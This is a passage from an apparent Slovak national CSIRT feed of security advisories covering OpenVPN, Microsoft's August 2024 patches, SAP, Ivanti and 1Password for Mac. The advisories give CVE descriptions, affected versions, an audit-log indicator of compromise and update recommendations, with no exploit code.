<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-27459 </strong>(CVSSv3 skóre 7.8)</p>



<p>Zraniteľnosť spočíva v&nbsp;nesprávnej implementácii načítavania veľkosti správ v&nbsp;rámci komunikácie medzi procesom <em>openvpn.exe</em> a&nbsp;službou <em>openvpnserv.exe</em>, ktorou možno vyvolať pretečenie zásobníka.</p>



<p><strong>CVE-2024-24974</strong> (CVSSv3 skóre 7.5 )</p>



<p>CVE-2024-24974 sa nachádza v&nbsp;<em>openvpnserv.exe</em> a&nbsp;umožňuje prístup k&nbsp;prostriedkom operačného systému.</p>



<p><strong>CVE-2024-27903</strong> (CVSSv3 skóre 7.2 )</p>



<p>Nedostatočná implementácia bezpečnostných mechanizmov umožňuje načítavanie OpenVPN pluginov z&nbsp;ľubovoľného adresára. Útočník by predmetnú zraniteľnosť mohol zneužiť na načítanie škodlivých pluginov.</p>



<p><strong>CVE-2024-1305</strong> (CVSSv3 skóre 7.8)</p>



<p>Zraniteľnosť nachádzajúca sa v&nbsp;ovládači <em>tap-windows6</em> spočíva v&nbsp;nesprávnom overovaní parametrov <em>PacketLength</em> a&nbsp;<em>PrefixLength</em> v rámci metódy <em>TapDeviceWrite</em> a vzdialený útočník by ju mohol zneužiť na pretečenia medzipamäte a&nbsp;následné vykonanie škodlivého kódu.</p>



<p>Zreťazením uvedených zraniteľností možno dosiahnuť eskaláciu privilégií a vzdialané vykonanie škodlivého kódu vedúce k získaniu úplnej kontroly nad systémom.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Zneprístupnenie služby</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a&nbsp;používateľom odporúčame bezodkladnú aktualizáciu OpenVPN na verziu 2.6.10 alebo novšiu.</p>



<p><strong>Zdroje:</strong></p>



<p><a href="https://www.microsoft.com/en-us/security/blog/2024/08/08/chained-for-attack-openvpn-vulnerabilities-discovered-leading-to-rce-and-lpe/">https://www.microsoft.com/en-us/security/blog/2024/08/08/chained-for-attack-openvpn-vulnerabilities-discovered-leading-to-rce-and-lpe/</a></p>



<p><a href="https://forums-new.openvpn.net/forum/announcements/69-release-openvpn-version-2-6-10">https://forums-new.openvpn.net/forum/announcements/69-release-openvpn-version-2-6-10</a></p>



<p><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27459">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27459</a></p>



<p><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24974">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24974</a></p>



<p><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27903">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27903</a></p>



<p><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1305">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1305</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1253/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Microsoft v rámci augustového Patch Tuesday opravil 9 kritických zraniteľností</title>
		<link>/posts/1248</link>
					<comments>/posts/1248#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 15 Aug 2024 10:47:52 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1248</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/MicrosoftLogo-4238232498.jpg" alt="" /></p>Spoločnosť Microsoft vydala v&#160;auguste 2024 balík opráv pre portfólio svojich produktov opravujúci 90 zraniteľností, z&#160;ktorých 24 umožňuje vzdialené vykonávanie kódu....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/MicrosoftLogo-4238232498.jpg" alt="" /></p>
<p><strong>Spoločnosť Microsoft vydala v&nbsp;auguste 2024 balík opráv pre portfólio svojich produktov opravujúci 90 zraniteľností, z&nbsp;ktorých 24 umožňuje vzdialené vykonávanie kódu. Kritické zraniteľnosti sa nachádzajú v&nbsp;produktoch Microsoft Dynamics 365, Microsoft Copilot Studio a Azure Health Bot a&nbsp;v komponentoch grub2, shim, Windows TCP</strong><strong>/IP, Windows Reliable Multicast Transport Driver a Windows Network Virtualization</strong><strong>. Zraniteľnosti s&nbsp;označením CVE-2024-38189, CVE-2024-38178, CVE-2024-38193, CVE-2024-38106, CVE-2024-38107 a CVE-2024-38213 sú aktívne zneužívané útočníkmi.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>.NET 8.0</li>



<li>App Installer</li>



<li>Azure Connected Machine Agent</li>



<li>Azure CycleCloud 8.0.0</li>



<li>Azure CycleCloud 8.0.1</li>



<li>Azure CycleCloud 8.0.2</li>



<li>Azure CycleCloud 8.1.0</li>



<li>Azure CycleCloud 8.1.1</li>



<li>Azure CycleCloud 8.2.0</li>



<li>Azure CycleCloud 8.2.1</li>



<li>Azure CycleCloud 8.2.2</li>



<li>Azure CycleCloud 8.3.0</li>



<li>Azure CycleCloud 8.4.0</li>



<li>Azure CycleCloud 8.4.1</li>



<li>Azure CycleCloud 8.4.2</li>



<li>Azure CycleCloud 8.5.0</li>



<li>Azure CycleCloud 8.6.0</li>



<li>Azure CycleCloud 8.6.1</li>



<li>Azure CycleCloud 8.6.2</li>



<li>Azure Health Bot</li>



<li>Azure IoT Hub Device Client SDK</li>



<li>Azure Linux 3.0 ARM</li>



<li>Azure Linux 3.0 x64</li>



<li>Azure Stack Hub</li>



<li>C SDK for Azure IoT</li>



<li>CBL Mariner 1.0 ARM</li>



<li>CBL Mariner 1.0 x64</li>



<li>CBL Mariner 2.0 ARM</li>



<li>CBL Mariner 2.0 x64</li>



<li>Dynamics CRM Service Portal Web Resource</li>



<li>Microsoft 365 Apps for Enterprise for 32-bit Systems</li>



<li>Microsoft 365 Apps for Enterprise for 64-bit Systems</li>



<li>Microsoft Copilot Studio</li>



<li>Microsoft Dynamics 365 (on-premises) version 9.1</li>



<li>Microsoft Edge (Chromium-based)</li>



<li>Microsoft Office 2016 (32-bit edition)</li>



<li>Microsoft Office 2016 (64-bit edition)</li>



<li>Microsoft Office 2019 for 32-bit editions</li>



<li>Microsoft Office 2019 for 64-bit editions</li>



<li>Microsoft Office LTSC 2021 for 32-bit editions</li>



<li>Microsoft Office LTSC 2021 for 64-bit editions</li>



<li>Microsoft Office LTSC for Mac 2021</li>



<li>Microsoft OfficePLUS</li>



<li>Microsoft Outlook 2016 (32-bit edition)</li>



<li>Microsoft Outlook 2016 (64-bit edition)</li>



<li>Microsoft PowerPoint 2016 (32-bit edition)</li>



<li>Microsoft PowerPoint 2016 (64-bit edition)</li>



<li>Microsoft Project 2016 (32-bit edition)</li>



<li>Microsoft Project 2016 (64-bit edition)</li>



<li>Microsoft Teams for iOS</li>



<li>Microsoft Visual Studio 2022 version 17.10</li>



<li>Microsoft Visual Studio 2022 version 17.6</li>



<li>Microsoft Visual Studio 2022 version 17.8</li>



<li>Remote Desktop client for Windows Desktop</li>



<li>Windows 10 Version 1607 for 32-bit Systems</li>



<li>Windows 10 Version 1607 for x64-based Systems</li>



<li>Windows 10 Version 1809 for 32-bit Systems</li>



<li>Windows 10 Version 1809 for ARM64-based Systems</li>



<li>Windows 10 Version 1809 for x64-based Systems</li>



<li>Windows 10 Version 21H2 for 32-bit Systems</li>



<li>Windows 10 Version 21H2 for ARM64-based Systems</li>



<li>Windows 10 Version 21H2 for x64-based Systems</li>



<li>Windows 10 Version 22H2 for 32-bit Systems</li>



<li>Windows 10 Version 22H2 for ARM64-based Systems</li>



<li>Windows 10 Version 22H2 for x64-based Systems</li>



<li>Windows 10 for 32-bit Systems</li>



<li>Windows 10 for x64-based Systems</li>



<li>Windows 11 Version 22H2 for ARM64-based Systems</li>



<li>Windows 11 Version 22H2 for x64-based Systems</li>



<li>Windows 11 Version 23H2 for ARM64-based Systems</li>



<li>Windows 11 Version 23H2 for x64-based Systems</li>



<li>Windows 11 Version 24H2 for ARM64-based Systems</li>



<li>Windows 11 Version 24H2 for x64-based Systems</li>



<li>Windows 11 version 21H2 for ARM64-based Systems</li>



<li>Windows 11 version 21H2 for x64-based Systems</li>



<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1</li>



<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)</li>



<li>Windows Server 2008 for 32-bit Systems Service Pack 2</li>



<li>Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)</li>



<li>Windows Server 2008 for x64-based Systems Service Pack 2</li>



<li>Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)</li>



<li>Windows Server 2012</li>



<li>Windows Server 2012 (Server Core installation)</li>



<li>Windows Server 2012 R2</li>



<li>Windows Server 2012 R2 (Server Core installation)</li>



<li>Windows Server 2016</li>



<li>Windows Server 2016 (Server Core installation)</li>



<li>Windows Server 2019</li>



<li>Windows Server 2019 (Server Core installation)</li>



<li>Windows Server 2022</li>



<li>Windows Server 2022 (Server Core installation)</li>



<li>Windows Server 2022, 23H2 Edition (Server Core installation)</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<ol style="list-style-type:upper-roman">
<li><strong></strong><strong>Kritické zraniteľnosti:</strong></li>
</ol>



<p><strong>CVE-2024-38063</strong> (CVSS skóre 9,8)</p>



<p>Kritickú zraniteľnosť v&nbsp;komponente Windows TCP/IP by vzdialený neautentifikovaný útočník prostredníctvom zaslania špeciálne vytvorených IPv6 paketov mohol zneužiť na vzdialené vykonanie škodlivého kódu. Zraniteľnosť je možné zneužiť len na systémoch s&nbsp;aktivovaným IPv6 a&nbsp;možno ju mitigovať vypnutím podpory IPv6.</p>



<p><strong>CVE-2024-38140</strong> (CVSS skóre 9,8)</p>



<p>Komponent RMCAST (Windows Reliable Multicast Transport Driver) obsahuje zraniteľnosť, ktorú by vzdialený neautentifikovaný útočník mohol zneužiť na vzdialené vykonanie kódu. Zraniteľnosť je možné zneužiť len v&nbsp;prípade, že je aktivovaná funkcia PGM (Pragmatic General Multicast) a ľubovoľná aplikácia počúva na PGM porte.</p>



<p><strong>CVE-2024-38109</strong> (CVSS skóre 9,1)</p>



<p>Zraniteľnosť v&nbsp;produkte Azure Health Bot sa nachádzajú v&nbsp;komponente Scenario Editor a&nbsp;spočívajú v&nbsp;nesprávnom spracovaní HTTP odpovedí obsahujúcich presmerovanie. Vzdialený neautentifikovaný útočník by ju prostredníctvom SSRF útoku mohol zneužiť na získanie prihlasovacích tokenov a neoprávnený prístup do systému. Zraniteľnosť odhalili bezpečnostní výskumníci zo spoločnosti TENABLE.</p>



<p><strong>CVE-2024-38159, CVE-2024-38160</strong> (CVSS skóre 9,1)</p>



<p>Zraniteľnosti v&nbsp;komponente Windows Network Virtualization spočívajú v&nbsp;použití odalokovaného miesta v&nbsp;pamäti a&nbsp;pretečení medzipamäte haldy. Vzdialený autentifikovaný útočník by ich mohol prostredníctvom úpravy obsahu MDL (Memory Descriptor List) zneužiť na vzdialené vykonanie škodlivého kódu. Zneužitie zraniteľnosti vyžaduje vysoké privilégiá umožňujúce manipuláciu bežiacich procesov</p>



<p><strong>CVE-2024-38206</strong> (CVSS skóre 8,5)</p>



<p>Zraniteľnosť v&nbsp;produkte Microsoft Copilot Studio by vzdialený autentifikovaný útočník mohol zneužiť obídenie bezpečnostných mechanizmov ochrany pred SSRF (Server Side Request Forgery) a získanie neoprávneného prístupu k&nbsp;citlivým údajom.</p>



<p><strong>CVE-2024-38166</strong> (CVSS skóre 8,2)</p>



<p>Nesprávna neutralizácia vstupov pri generovaní webového obsahu v&nbsp;produkte Microsoft Dynamics 365 umožňuje realizáciu XSS (Cross Site Scripting) útokov. Zneužitie zraniteľnosti vyžaduje interakciu zo strany používateľa, ktorý musí kliknúť na útočníkom podvrhnutý odkaz.</p>



<p><strong>CVE-2023-40547, CVE-2022-3775</strong> (CVSS skóre 8,3 a&nbsp;7,1)</p>



<p>Spoločnosť Microsoft opravila aj zraniteľnosti linuxových nástrojov grub2 a&nbsp;shim, ktoré umožňovali obídenie bezpečnostných mechanizmov Secure Boot a&nbsp;následné vykonanie škodlivého kódu.</p>



<ol style="list-style-type:upper-roman">
<li><strong></strong><strong>Aktívne zneužívané zero-day zraniteľnosti:</strong></li>
</ol>



<p>Aktívne zneužívané zraniteľnosti sa nachádzajú v&nbsp;produkte Microsoft Project (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38189">CVE-2024-38189</a>) a&nbsp;komponentoch Windows Scripting Engine (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38178">CVE-2024-38178</a>), Ancillary Function Driver (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38193">CVE-2024-38193</a>), Kernel (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38106">CVE-2024-38106</a>), Power Dependency Coordination (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38107">CVE-2024-38107</a>) a&nbsp;bezpečnostnom mechanizme Mark of the Web Security (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38213">CVE-2024-38213</a>). Uvedené zraniteľnosti možno zneužiť na vzdialené vykonanie kódu, eskaláciu privilégií a&nbsp;obídenie bezpečnostných mechanizmov SmartScreen.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>



<li><strong>Zneprístupnenie služby</strong></li>



<li><strong>Obídenie bezpečnostného prvku</strong></li>



<li><strong>Neoprávnená zmena v systéme</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Bezodkladné nasadenie augustového balíka opráv na zraniteľné produkty spoločnosti Microsoft. Bližšie informácie nájdete <a href="https://msrc.microsoft.com/update-guide/releaseNote/2024-Aug">tu</a>.</strong></p>



<p><strong>Zdroje:</strong></p>



<p><a href="https://msrc.microsoft.com/update-guide/releaseNote/2024-Aug">https://msrc.microsoft.com/update-guide/releaseNote/2024-Aug</a></p>



<p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-3775">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-3775</a></p>



<p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-40547">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-40547</a></p>



<p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063</a></p>



<p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38109">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38109</a></p>



<p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38140">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38140</a></p>



<p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38159">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38159</a></p>



<p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38160">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38160</a></p>



<p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38166">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38166</a></p>



<p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38206">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38206</a></p>



<p><a href="https://www.tenable.com/blog/compromising-microsofts-ai-healthcare-chatbot-service">https://www.tenable.com/blog/compromising-microsofts-ai-healthcare-chatbot-service</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1248/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti v produktoch SAP</title>
		<link>/posts/1246</link>
					<comments>/posts/1246#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 15 Aug 2024 10:45:24 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[access to sensitive information]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1246</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/SAP_zranitelnosti-1.jpg" alt="" /></p>Spoločnosť SAP vydala bezpečnostné aktualizácie na svoje portfólio produktov, ktoré opravujú 17 zraniteľností, z toho 2 sú označené ako kritické....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/SAP_zranitelnosti-1.jpg" alt="" /></p>
<p><strong>Spoločnosť SAP vydala bezpečnostné aktualizácie na svoje portfólio produktov, ktoré opravujú 17 zraniteľností, z toho 2 sú označené ako kritické. Kritické zraniteľnosti sa nachádzajú v&nbsp;produktoch SAP BusinessObjects Business Intelligence Platform a&nbsp;SAP Build Apps a&nbsp;možno ich zneužiť na realizáciu SSRF útokov a&nbsp;získanie neoprávneného prístupu do systému.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li><strong>SAP Build Apps</strong></li>



<li><strong>SAP BusinessObjects Business Intelligence Platform</strong></li>



<li>SAP BEx Web Java Runtime Export Web Service</li>



<li>SAP CRM ABAP</li>



<li>SAP Commerce, Commerce Backoffice, Commerce Cloud</li>



<li>SAP Content Server</li>



<li>SAP Document Builder</li>



<li>SAP NetWeaver Application Server ABAP</li>



<li>SAP Permit to Work</li>



<li>SAP Replication Server</li>



<li>SAP S/4 HANA</li>



<li>SAP Shared Service Framework</li>



<li>SAP Student Life Cycle Management (SLcM)</li>



<li>SAP Web Dispatcher</li>
</ul>



<p><em>Pozn. presné verzie zraniteľných produktov nájdete na stránke </em><a href="https://support.sap.com/en/my-support/knowledge-base/security-notes-news/august-2024.html"><em>výrobcu</em></a><em>.</em></p>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong><u>SAP BusinessObjects Business Intelligence Platform:</u></strong></p>



<p><strong>CVE-2024-41730 </strong>(CVSS skóre 9.8)</p>



<p>CVE-2024-41730 spočíva v nedostatočnej implementácii mechanizmov autentifikácie a vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvorenej požiadavky na REST rozhranie mohol zneužiť na získanie neoprávneného prístupu a úplnej kontroly nad systémom. Zraniteľnosť je možné zneužiť len na inštanciách so zapnutou funkciou SSO (Single Sign-On).</p>



<p>Zraniteľnosť CVE-2024-41730 ovplyvňuje verzie produktov ENTERPRISE 430, 440.</p>



<p><strong><u>SAP Build Apps:</u></strong></p>



<p><strong>CVE-2024-29415 </strong>(CVSS skóre 9.1)</p>



<p>Zraniteľnosť s označením CVE-2024-29415 sa nachádza v externom komponente Node.js a spočíva v nesprávnom rozlišovaní verejných a privátnych IP adries. Vzdialený útočník by ju prostredníctvom zaslania špeciálne vytvorenej požiadavky mohol zneužiť na realizáciu SSRF (Server Side Request Forgery) útokov.</p>



<p>Zraniteľnosť CVE-2024-29415 ovplyvňuje verzie produktov staršie akoSAP Build Apps, Versions ako 4.11.130.</p>



<p><strong><u>Ostatné produkty:</u></strong></p>



<p>Zraniteľnosti v&nbsp;ostatných produktoch možno zneužiť na vykonanie škodlivého kódu, realizáciu XSS (Cross Site Scripting) a&nbsp;SSRF (Server Side Request Forgery) útokov, XML injekciu, eskaláciu privilégií, zneprístupnenie služby, získanie neoprávneného prístupu k&nbsp;citlivým údajom a&nbsp;obídenie mechanizmov autentifikácie.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vykonanie škodlivého kódu</strong></li>



<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Neoprávnený prístup do systému</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>



<li><strong>Zneprístupnenie služby</strong></li>



<li><strong>Neoprávnený prístup k citlivým údajom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Odporúčame vykonať bezodkladnú aktualizáciu zasiahnutých systémov na najnovšiu možnú verziu.</p>



<p><strong>Zdroje:</strong></p>



<p><a href="https://support.sap.com/en/my-support/knowledge-base/security-notes-news/august-2024.html">https://support.sap.com/en/my-support/knowledge-base/security-notes-news/august-2024.html</a></p>



<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-41730">https://www.cve.org/CVERecord?id=CVE-2024-41730</a></p>



<p><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/350914">https://exchange.xforce.ibmcloud.com/vulnerabilities/350914</a></p>



<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-29415">https://www.cve.org/CVERecord?id=CVE-2024-29415</a></p>



<p><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/292577">https://exchange.xforce.ibmcloud.com/vulnerabilities/292577</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1246/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti v Ivanti Virtual Traffic Manager a Ivanti Neurons for ITSM</title>
		<link>/posts/1244</link>
					<comments>/posts/1244#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 14 Aug 2024 12:25:58 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[access to sensitive information]]></category>
		<guid isPermaLink="false">/?p=1244</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/Ivanti-1024x576.webp" alt="" /></p>Spoločnosť Ivanti vydala bezpečnostné aktualizácie pre svoje produkty Virtual Traffic Manager a Neurons for ITSM, ktoré opravujú 3 bezpečnostné zraniteľnosti,...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/Ivanti-1024x576.webp" alt="" /></p>
<p><strong>Spoločnosť Ivanti vydala bezpečnostné aktualizácie pre svoje produkty Virtual Traffic Manager a Neurons for ITSM, ktoré opravujú 3 bezpečnostné zraniteľnosti, z&nbsp;toho 2 sú označené ako kritické. Zneužitím zraniteľností je možné získať neoprávnený prístup do systému a&nbsp;k&nbsp;citlivým údajom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Ivanti Virtual Traffic Manager vo verzii staršej ako 22.2R1, 22.3R3, 22.5R2, 22.6R2 a 22.7R2</li>
</ul>



<p><em>Pozn. aktualizácie 22.3R3, 22.5R2 a 22.6R2 budú vydané v 34. kalendárnom týždni</em></p>



<ul>
<li>Ivanti Neurons for ITSM vo verzii 2023.2, 2023.3 a 2023.4 bez bezpečnostnej záplaty</li>
</ul>



<p><em>Pozn. Zraniteľnosti je možné zneužiť len na inštanciách, ktoré využívajú autentifikáciu prostredníctvom OIDC. Zraniteľné sú aj inštancie Ivanti Neurons for ITAM, nakoľko zdieľajú platformu s&nbsp;Ivanti Neurons for ITSM. Cloudové inštancie výrobca automaticky aktualizoval 4. augusta 2024.</em></p>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong><u>Ivanti Virtual Traffic Manager:</u></strong><strong><u></u></strong></p>



<p><strong>CVE-2024-7593 </strong>(CVSS skóre 9.8)</p>



<p>Zraniteľnosť spočíva v nesprávnej implementácii mechanizmov autentifikácie a vzdialený neautentifikovaný útočník by ju mohol zneužiť získanie neoprávneného prístupu do administratívneho rozhrania a&nbsp;následné vytvorenie administrátorských účtov. Na uvedenú zraniteľnosť je v súčasnosti dostupný proof-of-concept kód demonštrujúci návod pre jej zneužitie.</p>



<p>Úspešné zneužitie zraniteľnosti možno identifikovať analýzou obsahu Audit Logs Output. Administrátorské účty vytvorené zneužitím zraniteľnosti majú viacero polí nastavených na hodnotu <em>!!ABSENT!!</em>, viď. príklad:</p>



<p><em>[08/Aug/2024:21:54:22 +0530] USER=!!ABSENT!! GROUP=!!ABSENT!!&nbsp; AUTH=!!ABSENT!!&nbsp; IP=!!ABSENT!! OPERATION=adduser MODUSER=user2 MODGROUP=admin</em></p>



<p><strong><u>Ivanti Neurons for ITSM:</u></strong></p>



<p><strong>CVE-2024-7569 </strong>(CVSS skóre 9.6)</p>



<p>Zraniteľnosť umožňuje vzdialenému neautentifikovanému útočníkovi získať neoprávnený prístup k&nbsp;citlivým údajom OIDC klienta potrebných na prihlásenie do systému a&nbsp;následne získať úplnú kontrolu nad systémom.</p>



<p><strong>CVE-2024-7570 </strong>(CVSS skóre 8.3)</p>



<p>CVE-2024-7570 spočíva v&nbsp;nesprávnom overovaní certifikátov a&nbsp;vzdialený útočník v man-in-the-middle pozícii by ju mohol zneužiť na vytvorenie tokenu umožňujúceho získanie neoprávneného prístupu do systému.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>



<li><strong>Neoprávnený prístup do systému</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom Ivanti Virtual Traffic Manager odporúčame bezodkladnú aktualizáciu na verzie 22.2R1 alebo 22.7R2. Bezpečnostné záplaty s&nbsp;označení 22.3R3, 22.5R2 a 22.6R2 pre zvyšné zraniteľné verzie budú vydané v 34. kalendárnom týždni. V&nbsp;prípade, že aktualizáciu systémov nemožno vykonať, výrobca odporúča limitovať prístup k&nbsp;administratívnemu rozhraniu. Presný postup nájdete na stránke výrobcu v&nbsp;časti Mitigation and Workaround.</p>



<p>Administrátorom Ivanti Neurons for ITSM a&nbsp;Ivanti Neurons for ITAM odporúčame bezodkladnú inštaláciu bezpečnostných záplat.</p>



<p><strong>Zdroje:</strong></p>



<p><a href="https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Virtual-Traffic-Manager-vTM-CVE-2024-7593?language=en_US">https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Virtual-Traffic-Manager-vTM-CVE-2024-7593?language=en_US</a></p>



<p><a href="https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Neurons-for-ITSM-CVE-2024-7569-CVE-2024-7570?language=en_US">https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Neurons-for-ITSM-CVE-2024-7569-CVE-2024-7570?language=en_US</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1244/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosti nástroja pre správu hesiel 1Password pre MacOS</title>
		<link>/posts/1238</link>
					<comments>/posts/1238#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 13 Aug 2024 12:58:38 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[access to sensitive information]]></category>
		<guid isPermaLink="false">/?p=1238</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/08/1pass.jpg" alt="" /></p>Vývojári nástroja pre správu hesiel 1Password for Mac vydali bezpečnostné aktualizácie, ktoré opravujú dve bezpečnostné zraniteľnosti umožňujúce získanie neoprávneného prístupu...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/08/1pass.jpg" alt="" /></p>
<p><strong>Vývojári nástroja pre správu hesiel 1Password for Mac vydali bezpečnostné aktualizácie, ktoré opravujú dve bezpečnostné zraniteľnosti umožňujúce získanie neoprávneného prístupu k uloženým heslám. CVE-2024-42218 a CVE-2024-42219 možno zneužiť na obídenie bezpečnostných mechanizmov operačného systému macOS a&nbsp;mechanizmov riadenia vzájomnej komunikácie medzi procesmi.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>1Password 8 for Mac vo verzii staršej ako v8.10.38</li>
</ul>



<p>Pozn. 1Password 7 for Mac nie sú zraniteľnosťami zasiahnuté</p>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-42219 </strong>(CVSS skóre 6.3)</p>



<p>Zraniteľnosť spočíva v&nbsp;nesprávnej implementácii bezpečnostných mechanizmov riadenia vzájomnej komunikácie bežiacich procesov. Lokálny útočník by ju spustením špeciálne vytvoreného procesu mohol zneužiť na impersonáciu 1Password rozšírenia pre webové prehliadače alebo CLI (Command Line Interface) a&nbsp;následnú exfiltráciu citlivých údajov.</p>



<p><strong>CVE-2024-42218</strong> (CVSS skóre 6.3)</p>



<p>Lokálny útočník zraniteľnosť môže zneužiť na obídenie bezpečnostných mechanizmov macOS a&nbsp;získanie neoprávneného prístupu k&nbsp;citlivým údajom na kľúčenke macOS Keychain, ktoré sú asociované s&nbsp;aplikáciou 1Password.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a&nbsp;používateľom odporúčame bezodkladnú aktualizáciu 1Password pre MacOS na verziu v8.10.38 alebo novšiu. Rovnako odporúčame aktivovať funkciu automatickej aktualizácie softvéru.</p>



<p>Zneužitie zraniteľností vyžaduje lokálne spustenie malvéru. Nakoľko sú phishingové kampane najčastejším spôsobom infekcie malvérom, CSIRT.SK používateľom odporúča neotvárať URL odkazy a prílohy z neoverených alebo nedôveryhodných zdrojov.</p>



